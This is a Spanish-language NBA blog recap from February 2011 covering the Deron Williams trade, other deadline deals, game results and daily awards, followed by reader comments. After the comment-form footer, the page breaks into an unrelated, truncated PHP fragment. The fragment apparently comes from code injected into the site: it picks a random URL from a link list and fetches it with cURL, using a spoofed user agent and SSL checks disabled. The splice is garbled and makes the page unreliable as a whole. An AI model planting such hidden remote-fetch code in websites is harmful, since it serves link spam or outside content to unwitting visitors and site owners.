La Crónica (23/02/2011)

24 de February de 2011 por TheDeerHunter

“Everything happens for a reason. You take everything in stride,” – Deron Williams

Ya tendremos tiempo para analizarlo. Los Jazz dejaron anoche en fuera de juego al mundo baloncestístico con el traspaso de su máxima estrella y jugador franquicia los últimos años, a costa de rendir la temporada. Nadie lo vio venir. No podemos evitar la impresión de que esta manera de resolverlo tiene una parte de “ajuste de cuentas” por parte de Greg Miller. La guerra Sloan-Deron ha terminado mal para todas las partes y se confirma que el asunto ha llegado a emponzoñarse mucho más de lo que ha trascendido. Llegan a los Jazz Devin Harris y Derrick Favors, más un par de rondas de draft y un montante económico. La franquicia mormona comenzó su nueva andadura con un palizón en Dallas (99-118). La primera de un gran número de derrotas que a buen seguro les aguarda en los próximos tiempos.

Se confirmó también el traspaso que adelantábamos ayer entre los Kings y los Hornets, llevando a Landry junto a Chris Paul y Marcus Thornton hacia la capital californiana. Los Kings protagonizaron una de las sorpresas de la jornada ganando en Orlando, con Dalembert en estado de gracia y Jermaine Taylor de ejecutor (111-105). Los Hornets también ganaron a los Clippers aún más cómodamente gracias a la baja de Baron Davis (87-98), que ha sido traspasado a los Cavs a cambio de Mo Williams y Jamario Moon en una operacion que sólo se puede explicar desde un punto de visto económico.

Hinrich finalmente recala en Atlanta junto a Hilton Armstrong a cambio de Bibby, Jordan Crawford, Maurice Evans y una primera ronda. Los Wizards cayeron en Philadelphia, 94-117, y los Hawks se llevaron la segunda derrota consecutiva en Phoenix con una contribución portentosa del banquillo local y ya asedian la posición de Utah (97-105).

Mientras tanto el Madison Square Garden se vestía de gala para arropar a su rutilante nueva estrella. Melo respondió gustándose, cuajando un estupendo debut y liderendo al equipo a la victoria frente Milwaukee (108-114). Billups, Stat y también Toney Douglas contribuyeron con buenas actuaciones. Por lo Bucks el mejor fue Salmons.

En el resto de partidos:

– Los Spurs lograron aguantar el ímpetu de los Thunder ganando en un apasionante choque en el filo (105-109).
– Los Lakers ganaron a Portland en la prórroga en un gran triple duelo Kobe-Artest-Gasol contra Matthews-Batum-Aldridge (106-101). Roy volvió a vestirse de corto.
– Los Grizzlies consolidan su plaza de playoffs en Minnesotta, a pesar del récord de dobles dobles de Kevin Love atrapando al mismísimo Moses Malone con 44 dobles-dobles consecutivos (104-99).
– Houston mantiene sus opciones con su victoria en Cleveland con 30 puntos por cabeza de Martin y  Budinger (124-119).
– Los Raptors protagonizaron la otra sorpresa ganando a Chicago, a pesar de la vuelta de Noah y la impresionante actuación de Rose (113-118).
– Finalmente los Pacers sobrevivieron a los Pistons por un punto (101-102). Gran actuación de Hansbrough y de Monroe.

PREMIOS

MVP: ¡Este es el Kobe Bryant que conocemos! 37 puntos, 9 rebotes, 6 asistencias, 3 robos y una actuación fundamental tanto en el último cuarto como en la prórroga.

Rookie: Greg Monroe se marcó anoche el mejor partido de su vida en la NBA. 27 puntos y 12 rebotes que le sirvieron para superar a compañeros como John Wall o Blake Griffin. Trevor Booker también disputó su mejor partido hasta el momento con 21 puntos y 9 de 10 en tiros de campo.

Sorpresa: Chase Budinger demostró anoche que está preparado para asumir más minutos en el caso que Shane Battier abandone la franquicia. Sus 30 puntos y 8 rebotes fueron claves para vencer a los Cavs.

Decepción: La pareja de bases de Houston (Lowry-Brooks) se cascó anoche un 3 de 22. Peor que el 0 de 8 de AJ Price.

Esfuerzo en vano: Lamarcus Aldridge luchó hasta la extenuación pero finalmente sus 29 puntos, 14 rebotes y 4 robos se estrellaron ante el buen partido de Kobe & Gasol.

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. Len Bias dice:
    #1

    Mucho movimiento últimamente, aunque parece que algunos equipos fichan por fichar, por no quedarse quietos ante el cierre del mercado.

    PD: Veo más esfuerzo en vano el de Howard (31-17)

      Citar

  2. Busky23 dice:
    #2

    Sorpresón en Toronto precisamente el día de la vuelta de Noah,tremendo A.Johnson anotando un canastón y luego taponando a Rose en la ultima jugada para acabar completando un partidazo con 100% en tiros de campo. Calderón,17 asistencias,anotar ya no anota pero reparte que da gusto.

    Estratosférico Kobe,e irreconocible Artest… a ver si el parónimas del All-Star le ha ido bien para hablar con Dios  y espabila de una vez.

    Aún estoy en estado de shock con lo de Williams,la afición debe estar alucinando,en medio año ha desaparecido de un plumazo la columna vertebral del equipo (Boozer- Deron-Sloan),en los próximos días supongo que empezaremos a saber que ha pasado hay dentro realmente.
    Creo que ya tenemos otro candidato al mayor esfuerzo en vano,hoy 30-8… A.Jefferson.

      Citar

  3. Txusma dice:
    #3

    Evidentemente. La actuación de Dwight Howard se merece más el galardón. Se nos coló!

      Citar

  4. Denise dice:
    #4

    Vaya, el Jermayne Taylor éste no podía haber escogido otro día para exhibirse.
    Otra derrota que confirma que esta plantilla es inferior a la de años anteriores y que no puede pelear por el titulo, salvo lesiones de sua adversarios.
    Me alegro por los Clippers, que se han quitado de en medio a Baron Davis, una estafa de jugador por muy epectacular que sea. También me alegro por los Hawks, que se han quitado de en medio a otra estafa aún mayor como Bibby.
    Aparte de Budinger, el sorpresón ha sido Artest dando lecciones en el tiro de 3.
    ¿Creeis que ha estado practicandolo durante el All-Star?

      Citar

  5. Denise dice:
    #5

    A Howard en el esfuezo en vano le pasa como a Griffin en el de rookie. Lo hace tantas veces que ya no merece la pena ni ponerlo.

      Citar

  6. Denise dice:
    #6

    ¿Alguién ha visto el Raptors-Bulls?
    ¿Alguién puede decirme objetivamente si Calderón se ha “zampado” a Rose y “le ha superado” como publica el diario deportivo más seguido del país?

      Citar

  7. MagicJohnson32 dice:
    #7

    Gran partido el Blazers-Lakers, con LaMarcus mandando durante 3 cuartos pero desapareciendo al final, con varios fallos que hicieron posible la remontada. Kobe aguantó al equipo con una segunda mitad tremenda, y al final Artest y Pau estuvieron finísimos para sacar una victoria que vale doble, porque el partido estaba perdido (80-87 a 1:30 para el final) y porque es una pista que se da terriblemente mal a los Lakers.

      Citar

  8. scriers dice:
    #8

    Es que no es comparable Denise. Calderón tiene una gran visión de juego para el tiro abierto, que normalmente nadie ataca en líneas de pase. Sin embargo Rose cierra bien las penetraciones porque tiene físico y tapona incluso, así que Calderón hace bien en no penetrar. Como está flojito en el tiro, tiró poco, porque además, no las tiene todas consigo para hacer bandejas contra tíos como Rose.

    Sin embargo, Rose penetra bien, pero es una escopeta de feria tirando de lejos. Yo diría que ninguno se comió al otro, sino que simplemente cada uno hizo su juego. Calde da muchas asistencias porque Toronto ataca bien (y defiende fatal), con gente abierta y de buenos % (Bargnani y Barbosa).

      Citar

  9. CAMPO2 dice:
    #9

    Denise mas estafa me parece lo que consiguen a cambio que es un base tirador y un saltimbanqui, Baron Davis se entendia a la perfeccion con los hombres interiores de Clippers, en lo de Mike bibby no te digo nada que hay si que habia que cambiar algo y lo que han conseguido es muy bueno

      Citar

  10. Viva_Dirk dice:
    #10

    Pues buen fichaje para los Hawks ¿no? Aunque Hinrich no sea lo que se esperaba de el cuando firmó su actual contrato no cabe duda de que mejora mucho a Bibby, de hecho lo mejora en todas las facetas del juego.

    Y para los Clippers no me parece un mal negocio vender a Davis, Mo Williams es muy compatible con Gordon y Griffin, y Jamario es un buen hombre de banquillo.

      Citar

  11. sergio dice:
    #11

    Sé que Hinrich cobra unos 9 millones…. alguien sabe cuanto cobra Bibby? Desde luego, aunque cobren mas o menos lo mismo me parece dar duros por pesetas. Para mi Hinrich era uno de los activos mas interesantes en estos dias de traspasos. Una pena que los Hawks no tengan un pivot alto o físico para la rotación.

    Denise, ayer Calderon no se comió a Rose. Al menos lo que yo entiendo por comerse a alguien. Calderon leyó muy bien el partido y supo jugar a la perfección su papel. Rose estuvo fallón y tampoco fue por la tremenda defensa de Calderón (creo que hizo la primera falta al final del 3er cuarto).

    Ayer se produjeron los retornos de Roy, Kaman y Noah… para mi, la mejor noticia del día.

      Citar

  12. sergio dice:
    #12

    Ah! por cierto ‘scriers’… ayer casi no dió ni una asistencia a tiros abiertos (0% en triples para los canadienses). Mas bien repartió a gente saliendo del rebote, pick & rolls, contraataques y balones a los pivots

      Citar

  13. Ru dice:
    #13

    @sergio: pues Bibby cobra 5.5 millones aproximadamente.El año que viene 6.2 K que es su último año de contrato.

    Para un jugador con sus prestaciones actuales es un buen destino,a cobrar su dinerito haciendo lo mínimo porque Wall es el referente de la franquicia.Bien por Atlanta que ha conseguido hacer un cambio bastante interesante.Hinrich no es un jugón pero puede aportar mucho más que “Miniyo” Bibby.A ver si Jordan Crawford refrenda en los Wizards su Summer League,a priori debería tener más minutos que en los Hawks…aunque tampoco es difícil.

    Lo de Deron me deja sentimientos contrapuestos.Me gusta que hayan sacado a Harris -aunque haya bajado sus números,jugar en Utah es distinto que en los Nets- y Favors -menos talento que Cousins pero a largo plazo muy buen proyecto de jugador,deben confiar en él- más dos primeras rondas por D-Will,pero sin embargo veo una indefinición en la gestión de los Jazz.Firmas a Al Jefferson con un gran contrato y te desprendes de Deron.No sigues con el técnico que le ha dado sentido al proyecto durante tantos años.Fichas a Favors,con lo que tienes a Favors,Al Jefferson y Millsap.Muchas dudas…por nombres deberían seguir adelante pero quizás sea momento de dejarse ir y sentar bien las bases en verano para ver qué quieren hacer.

      Citar

  14. Denise dice:
    #14

    @sergio: Bibby cobra 5,5 esta temporada y 6,2 la que viene, y en la 12/13 ya es agente libre, aunque será mejor que se retire.
    Pedazo de backcourt el que consiguen Clippers con Mo y Gordon para ametrallar el aro rival desde el triple y aprovechar las ventajas generadas por Blake y Kaman (si vuelve bien).
    Para mi, Mo es ahora mismo mejor que Davis, lo que pasa es que este último hace jugadas que te levantan del asiento y hace parecer más bueno, pero a la hora de la verdad, vale lo mismo una simple bandeja que un mate tras hacer un rectificado en el aire. Además, si mis calculos no son equivocados, de momento se ahorrán los Clippers 10 millones de dólares aproximadamente.
    Pero para gustos los colores.
    Vaya vertedero el que se está formando en Washington, entre jugadores que se dejan llevar, por su desidia y su mala cabeza, lo cierto es que han sido capaz de juntar a Rashard Lewis, Bibby, Josh Howard, Yinlian, Blatche y McGee (estos 2 que no son malos, pero solo juegan cuando les sale de abajo), Al Thornton, Maurice Evans.
    Este General Manager se merece un premio.

    Según recogen algunos medios, el agente de Rudy dice mas o menos “rescindiremos el contrato si de traspasan a Rudy. El solo quiere jugar en portland o regresar a Europa”.
    O una de dos, la informaciñon es mentira, o Rudy y su agente son idiotas y aún no se han dado cuenta de que la NBA no es el futbol que siempre ganan los mismos, y que un equipo malo puede pasar a ser ganador al año siguiente.
    ¿Creeis que ahora mismo Rudy podría rechazar un trade que lo llevase a Mavs, Celtics, o Thunder, por poner ejemplos? O incluso si va a un equipo perdedor, no pasa nada, al año siguiente pueden ser los mejores.
    Rudy es muy bueno jugando, pero que se calle la boca, que hasta un adolescente hace declaraciones mas sensatas.

      Citar

  15. Sempren dice:
    #15

    @sergio, Kaman ya había vuelto hace un par de partidos, o eso vi en las estadísticas de los partidos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>